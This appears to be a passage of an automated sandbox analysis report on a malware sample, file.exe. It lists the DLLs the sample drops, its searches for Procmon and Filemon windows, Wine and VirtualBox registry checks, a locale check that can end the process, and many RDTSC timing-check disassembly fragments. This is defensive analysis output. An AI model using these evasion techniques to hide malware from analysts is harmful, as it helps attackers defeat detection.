Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_003B9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58584

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 786212 second address: 786218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CAF9 second address: 77CAFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7851B5 second address: 7851DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD079h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jns 00007F6B38DFD066h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7851DA second address: 785203 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B3885AF06h 0x00000008 jmp 00007F6B3885AF16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 785374 second address: 78538E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B38DFD076h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78538E second address: 785392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 785505 second address: 78550B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78550B second address: 785511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7856A5 second address: 7856AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7856AE second address: 7856B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7856B6 second address: 7856C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B38DFD06Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 785AA3 second address: 785AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f js 00007F6B3885AF0Eh 0x00000015 js 00007F6B3885AF06h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78747D second address: 7874CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jg 00007F6B38DFD07Bh 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007F6B38DFD06Ch 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 js 00007F6B38DFD074h 0x0000002a pushad 0x0000002b jc 00007F6B38DFD066h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787701 second address: 78778B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F6B3885AF06h 0x00000009 jmp 00007F6B3885AF19h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jmp 00007F6B3885AF17h 0x00000019 jmp 00007F6B3885AF13h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push esi 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 jbe 00007F6B3885AF06h 0x0000002d popad 0x0000002e pop esi 0x0000002f pop eax 0x00000030 mov ecx, dword ptr [ebp+122D3A8Bh] 0x00000036 push 00000003h 0x00000038 mov di, 1E2Dh 0x0000003c push 00000000h 0x0000003e mov dx, ax 0x00000041 push 00000003h 0x00000043 mov edi, dword ptr [ebp+122D38FFh] 0x00000049 call 00007F6B3885AF09h 0x0000004e push eax 0x0000004f push edi 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78778B second address: 7877F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F6B38DFD078h 0x00000010 popad 0x00000011 js 00007F6B38DFD07Ah 0x00000017 jmp 00007F6B38DFD074h 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 jmp 00007F6B38DFD06Dh 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6B38DFD079h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7877F8 second address: 7877FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7877FD second address: 787864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jne 00007F6B38DFD072h 0x00000013 pop eax 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F6B38DFD068h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D3558h], edi 0x00000034 jl 00007F6B38DFD06Ch 0x0000003a mov esi, dword ptr [ebp+122D378Fh] 0x00000040 lea ebx, dword ptr [ebp+124593AFh] 0x00000046 mov dword ptr [ebp+122D3558h], ecx 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787864 second address: 787868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787868 second address: 787871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7878CB second address: 7878FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F6B3885AF0Fh 0x0000000e mov dword ptr [ebp+122D1D2Fh], eax 0x00000014 pop edi 0x00000015 push 00000000h 0x00000017 stc 0x00000018 push CB038A05h 0x0000001d jl 00007F6B3885AF18h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7878FC second address: 787900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787900 second address: 78799C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6B3885AF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 34FC767Bh 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F6B3885AF08h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D2FC3h], ebx 0x00000031 push 00000003h 0x00000033 jne 00007F6B3885AF13h 0x00000039 push 00000000h 0x0000003b mov si, 1369h 0x0000003f push 00000003h 0x00000041 mov dword ptr [ebp+122D1C15h], edi 0x00000047 adc edx, 3256AF92h 0x0000004d push 6D8E68C1h 0x00000052 jmp 00007F6B3885AF0Eh 0x00000057 add dword ptr [esp], 5271973Fh 0x0000005e or edx, dword ptr [ebp+122D39EFh] 0x00000064 lea ebx, dword ptr [ebp+124593BAh] 0x0000006a mov dh, 3Ah 0x0000006c push eax 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F6B3885AF12h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 777A40 second address: 777A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 777A44 second address: 777A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7218 second address: 7A7229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6B38DFD066h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7229 second address: 7A7233 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6B3885AF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7233 second address: 7A724A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007F6B38DFD06Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A74EB second address: 7A74F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A74F1 second address: 7A74F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A77F3 second address: 7A77FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A77FF second address: 7A7811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B38DFD06Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7811 second address: 7A783B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F6B3885AF16h 0x0000000b push ecx 0x0000000c jns 00007F6B3885AF06h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 popad 0x00000016 push edi 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7974 second address: 7A7978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7978 second address: 7A797C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7AE3 second address: 7A7AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7AEB second address: 7A7AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7C72 second address: 7A7C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B38DFD06Bh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7C89 second address: 7A7C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F6B3885AF06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7C99 second address: 7A7C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7E1C second address: 7A7E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F6B3885AF10h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007F6B3885AF42h 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007F6B3885AF06h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7E46 second address: 7A7E68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD074h 0x00000007 jg 00007F6B38DFD066h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7E68 second address: 7A7E72 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6B3885AF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7F99 second address: 7A7FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B38DFD072h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F6B38DFD066h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7FBC second address: 7A7FC6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6B3885AF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7FC6 second address: 7A7FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A827A second address: 7A82AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B3885AF0Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F6B3885AF06h 0x00000010 jmp 00007F6B3885AF12h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A82AA second address: 7A82BC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6B38DFD066h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A840C second address: 7A841E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6B3885AF0Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A841E second address: 7A8422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A8422 second address: 7A843E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6B3885AF12h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A8B5C second address: 7A8B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A90E7 second address: 7A90ED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A90ED second address: 7A9112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B38DFD076h 0x00000009 jmp 00007F6B38DFD06Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9112 second address: 7A9118 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ACF3B second address: 7ACF62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F6B38DFD066h 0x00000009 jmp 00007F6B38DFD075h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ACF62 second address: 7ACF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AFB65 second address: 7AFB73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B019C second address: 7B01E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F6B3885AF15h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F6B3885AF18h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jne 00007F6B3885AF0Ch 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B02E1 second address: 7B02EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F6B38DFD066h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B02EE second address: 7B02FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jc 00007F6B3885AF0Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B02FF second address: 7B0316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6B38DFD068h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0316 second address: 7B031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B031F second address: 7B0323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3EEA second address: 7B3F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B3885AF11h 0x00000009 jbe 00007F6B3885AF06h 0x0000000f jnl 00007F6B3885AF06h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7743DA second address: 7743E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7743E0 second address: 7743E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3489 second address: 7B349F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B38DFD072h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B349F second address: 7B34F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6B3885AF17h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F6B3885AF12h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b js 00007F6B3885AF06h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B34F2 second address: 7B34F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B34F7 second address: 7B351C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F6B3885AF06h 0x0000000b jmp 00007F6B3885AF18h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B366C second address: 7B3676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6B38DFD066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B37E3 second address: 7B37EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F6B3885AF06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3AA8 second address: 7B3AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3D2E second address: 7B3D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3D34 second address: 7B3D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
